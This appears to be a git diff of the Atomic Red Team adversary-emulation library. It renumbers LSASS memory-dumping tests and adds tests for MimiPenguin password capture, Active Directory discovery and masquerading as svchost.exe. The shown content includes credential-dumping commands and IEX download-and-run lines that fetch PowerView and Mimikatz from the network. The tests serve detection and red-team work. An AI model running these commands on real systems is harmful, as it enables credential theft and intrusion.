+- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
 
-- [Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
+- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
 
-- [Atomic Test #5 - Dump LSASS.exe Memory using NanoDump](#atomic-test-5---dump-lsassexe-memory-using-nanodump)
+- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
 
-- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
+- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
 
-- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
+- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
 
-- [Atomic Test #8 - LSASS read with pypykatz](#atomic-test-8---lsass-read-with-pypykatz)
+- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
 
-- [Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-9---dump-lsassexe-memory-using-out-minidumpps1)
+- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
 
-- [Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-10---create-mini-dump-of-lsassexe-using-procdump)
+- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
 
-- [Atomic Test #11 - Powershell Mimikatz](#atomic-test-11---powershell-mimikatz)
+- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
 
-- [Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-12---dump-lsass-with-net-5-createdumpexe)
-
-- [Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-13---dump-lsassexe-using-imported-microsoft-dlls)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
 
 
 <br/>
 
-## Atomic Test #1 - Windows Credential Editor
-Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
-
-Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
-
-If you see no output it is likely that execution was blocked by Anti-Virus. 
-
-If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
-| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
-| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;wce.exe|
-| wce_url | Path to download Windows Credential Editor zip file | Url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{wce_exe} -o #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del "#{output_file}" >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-  Expand-Archive $zippath $parentpath\wce -Force
-  Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-  Remove-Item $zippath, $parentpath\wce -Recurse
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
+## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump.
 
@@ -179,7 +112,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
 <br/>
 <br/>
 
-## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
+## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
 
 Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
@@ -213,7 +146,7 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
+## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
 https://github.com/outflanknl/Dumpert
 https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -269,7 +202,7 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
 <br/>
 <br/>
 
-## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump
+## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
 The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
 
 https://github.com/helpsystems/nanodump
@@ -318,7 +251,7 @@ Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe0274
 <br/>
 <br/>
 
-## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
 Manager and administrative permissions.
 
@@ -352,7 +285,7 @@ Manager and administrative permissions.
 <br/>
 <br/>
 
-## Atomic Test #7 - Offline Credential Theft With Mimikatz
+## Atomic Test #6 - Offline Credential Theft With Mimikatz
 The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
 Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
 
@@ -413,7 +346,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
 <br/>
 <br/>
 
-## Atomic Test #8 - LSASS read with pypykatz
+## Atomic Test #7 - LSASS read with pypykatz
 Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
 
 Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -478,7 +411,7 @@ pip install pypykatz
 <br/>
 <br/>
 
-## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1
+## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
 The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
 powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
 Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
@@ -513,7 +446,7 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump
+## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
 
@@ -571,7 +504,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
 <br/>
 <br/>
 
-## Atomic Test #11 - Powershell Mimikatz
+## Atomic Test #10 - Powershell Mimikatz
 Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
 If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
 Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
@@ -607,7 +540,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
 <br/>
 <br/>
 
-## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe
+## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
 This test uses the technique describe in this tweet 
 (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
 
@@ -662,7 +595,7 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
 <br/>
 <br/>
 
-## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
 importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
 file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.

atomics/T1003.001/T1003.001.yaml

@@ -1,56 +1,6 @@
 attack_technique: T1003.001
 display_name: "OS Credential Dumping: LSASS Memory"
 atomic_tests:
-- name: Windows Credential Editor
-  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-  description: |
-    Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
-
-    Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
-
-    If you see no output it is likely that execution was blocked by Anti-Virus. 
-
-    If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.
-  supported_platforms:
-  - windows
-  input_arguments:
-    output_file:
-      description: Path where resulting data should be placed
-      type: Path
-      default: '%temp%\wce-output.txt'
-    wce_zip_hash:
-      description: File hash of the Windows Credential Editor zip file
-      type: String
-      default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
-    wce_exe:
-      description: Path of Windows Credential Editor executable
-      type: Path
-      default: PathToAtomicsFolder\T1003.001\bin\wce.exe
-    wce_url:
-      description: Path to download Windows Credential Editor zip file
-      type: Url
-      default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      Windows Credential Editor must exist on disk at specified location (#{wce_exe})
-    prereq_command: |
-      if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-      if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-        Expand-Archive $zippath $parentpath\wce -Force
-        Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-        Remove-Item $zippath, $parentpath\wce -Recurse
-      }
-  executor:
-    command: |
-      #{wce_exe} -o #{output_file}
-    cleanup_command: del "#{output_file}" >nul 2>&1
-    name: command_prompt
-    elevation_required: true
 - name: Dump LSASS.exe Memory using ProcDump
   auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
   description: |

atomics/T1003.007/T1003.007.md

@@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
 
 - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
 
+- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
+
 
 <br/>
 
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Capture Passwords with MimiPenguin
+MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{MimiPenguin_Location} > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file} > /dev/null
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+##### Check Prereq Commands:
+```sh
+if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+mkdir /tmp/mimipenguin
+tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+```
+##### Description: Strings must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install binutils
+```
+##### Description: Python2 must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install python2
+```
+##### Description: Libc-bin must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install libc-bin
+```
+
+
+
+
 <br/>

atomics/T1003.007/T1003.007.yaml

@@ -104,3 +104,57 @@ atomic_tests:
       grep -i "PASS" "#{output_file}"
     cleanup_command: |
       rm -f "#{output_file}"
+- name: Capture Passwords with MimiPenguin
+  auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+  description: |
+    MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+    Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+    See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+    See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007Test3.txt
+    MimiPenguin_Location:
+      description: Path of MimiPenguin script
+      type: Path
+      default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+    prereq_command: |
+      if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+      mkdir /tmp/mimipenguin
+      tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+  - description: |
+      Strings must be installed
+    prereq_command: |
+      if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install binutils
+  - description: |
+      Python2 must be installed
+    prereq_command: |
+      if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install python2       
+  - description: |
+      Libc-bin must be installed
+    prereq_command: |
+      if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install libc-bin        
+  executor:
+    command: |
+      sudo #{MimiPenguin_Location} > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file} > /dev/null
+    name: bash
+    elevation_required: true

atomics/T1018/T1018.md

@@ -36,6 +36,14 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
 
 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
 
+- [Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-16---enumerate-active-directory-computers-with-get-adcomputer)
+
+- [Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-17---enumerate-active-directory-computers-with-adsisearcher)
+
+- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
+
+- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
+
 
 <br/>
 
@@ -634,4 +642,123 @@ write-host "This PC must be manually added to a domain."
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
+The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+Upon successful execution a listing of Computers will output with their paths in AD.
+Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdComputer -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+Upon successful execution a listing of computers will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #18 - Get-DomainController with PowerView
+Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+Upon successful execution a listing of Systems from AD will output with their paths.
+Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiobject -class ds_computer -namespace root\directory\ldap
+```
+
+
+
+
+
+
 <br/>

atomics/T1018/T1018.yaml

@@ -310,3 +310,53 @@ atomic_tests:
         Write-Host $Computer}
     name: powershell
     elevation_required: false
+- name: Enumerate Active Directory Computers with Get-AdComputer
+  auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+  description: |
+    The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+    Upon successful execution a listing of Computers will output with their paths in AD.
+    Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-AdComputer -Filter *
+- name: Enumerate Active Directory Computers with ADSISearcher
+  auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+    Upon successful execution a listing of computers will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+- name: Get-DomainController with PowerView
+  auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+  description: |
+    Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+    name: powershell
+- name: Get-wmiobject to Enumerate Domain Controllers
+  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+  description: |
+    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+    Upon successful execution a listing of Systems from AD will output with their paths.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-wmiobject -class ds_computer -namespace root\directory\ldap

atomics/T1036.005/T1036.005.md

@@ -8,6 +8,8 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
 
 - [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
 
+- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)
+
 
 <br/>
 
@@ -48,4 +50,49 @@ rmdir $HOME/.../
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Masquerade as a built-in system executable
+Launch an executable that attempts to masquerade as a legitimate executable.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir&#92;Temp&#92;svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -TypeDefinition @'
+public class Test {
+    public static void Main(string[] args) {
+        System.Console.WriteLine("tweet, tweet");
+    }
+}
+'@ -OutputAssembly "#{executable_filepath}"
+
+Start-Process -FilePath "#{executable_filepath}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1036.005/T1036.005.yaml

@@ -1,23 +1,18 @@
----
 attack_technique: T1036.005
 display_name: 'Masquerading: Match Legitimate Name or Location'
-
 atomic_tests:
 - name: Execute a process from a directory masquerading as the current parent directory.
   auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
   description: |
     Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
-
   supported_platforms:
     - macos
     - linux
-
   input_arguments:
     test_message:
       description: Test message to echo out to the screen
       type: String
       default: Hello from the Atomic Red Team test T1036.005#1
-
   executor:
     name: sh
     elevation_required: false
@@ -28,3 +23,28 @@ atomic_tests:
     cleanup_command: |
       rm -f $HOME/.../sh
       rmdir $HOME/.../
+- name: Masquerade as a built-in system executable
+  auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+  description: |
+    Launch an executable that attempts to masquerade as a legitimate executable.
+  supported_platforms:
+  - windows
+  input_arguments:
+    executable_filepath:
+      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
+      type: String
+      default: $Env:windir\Temp\svchost.exe
+  executor:
+    command: |
+      Add-Type -TypeDefinition @'
+      public class Test {
+          public static void Main(string[] args) {
+              System.Console.WriteLine("tweet, tweet");
+          }
+      }
+      '@ -OutputAssembly "#{executable_filepath}"
+      
+      Start-Process -FilePath "#{executable_filepath}"
+    cleanup_command: |
+      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+    name: powershell

atomics/T1057/T1057.md

@@ -10,6 +10,12 @@ In Windows environments, adversaries could obtain details on running processes u
 
 - [Atomic Test #2 - Process Discovery - tasklist](#atomic-test-2---process-discovery---tasklist)
 
+- [Atomic Test #3 - Process Discovery - Get-Process](#atomic-test-3---process-discovery---get-process)
+
+- [Atomic Test #4 - Process Discovery - get-wmiObject](#atomic-test-4---process-discovery---get-wmiobject)
+
+- [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process)
+
 
 <br/>
 
@@ -80,4 +86,94 @@ tasklist
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Process Discovery - Get-Process
+Utilize Get-Process PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Discovery - get-wmiObject
+Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b51239b4-0129-474f-a2b4-70f855b9f2c2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiObject -class Win32_Process
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Process Discovery - wmic process
+Utilize windows management instrumentation to identify processes.
+
+Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wmic process get /format:list
+```
+
+
+
+
+
+
 <br/>

atomics/T1057/T1057.yaml

@@ -34,4 +34,39 @@ atomic_tests:
     command: |
       tasklist
     name: command_prompt
+- name: Process Discovery - Get-Process
+  auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+  description: |
+    Utilize Get-Process PowerShell cmdlet to identify processes.
 
+    Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-Process
+    name: powershell
+- name: Process Discovery - get-wmiObject
+  auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
+  description: |
+    Utilize get-wmiObject PowerShell cmdlet to identify processes.
+
+    Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      get-wmiObject -class Win32_Process
+    name: powershell
+- name: Process Discovery - wmic process
+  auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+  description: |
+    Utilize windows management instrumentation to identify processes.
+
+    Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      wmic process get /format:list
+    name: command_prompt

atomics/T1059.003/T1059.003.md

@@ -14,6 +14,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
 
 - [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)
 
+- [Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing](#atomic-test-4---simulate-blackbyte-ransomware-print-bombing)
+
 
 <br/>
 
